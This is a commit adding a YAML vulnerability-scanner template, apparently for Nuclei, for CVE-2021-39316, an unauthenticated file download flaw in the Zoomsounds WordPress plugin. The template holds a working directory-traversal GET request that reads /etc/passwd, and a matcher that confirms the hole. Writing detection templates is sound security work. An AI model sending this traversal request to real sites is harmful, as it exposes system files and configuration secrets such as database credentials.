Create CVE-2021-39316.yaml

patch-1
Muhammad Daffa 2021-09-23 07:07:52 +07:00 committed by GitHub
parent 58ca327e55
commit 2df403879a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 25 additions and 0 deletions

View File

@ -0,0 +1,25 @@
id: CVE-2021-39316
info:
name: DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
author: daffainfo
severity: high
description: The Zoomsounds plugin <= 6.45 for WordPress allows arbitrary files, including sensitive configuration files such as wp-config.php, to be downloaded via the `dzsap_download` action using directory traversal in the `link` parameter.
reference: https://wpscan.com/vulnerability/d2d60cf7-e4d3-42b6-8dfe-7809f87547bd
tags: wordpress,cve2021,cve,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200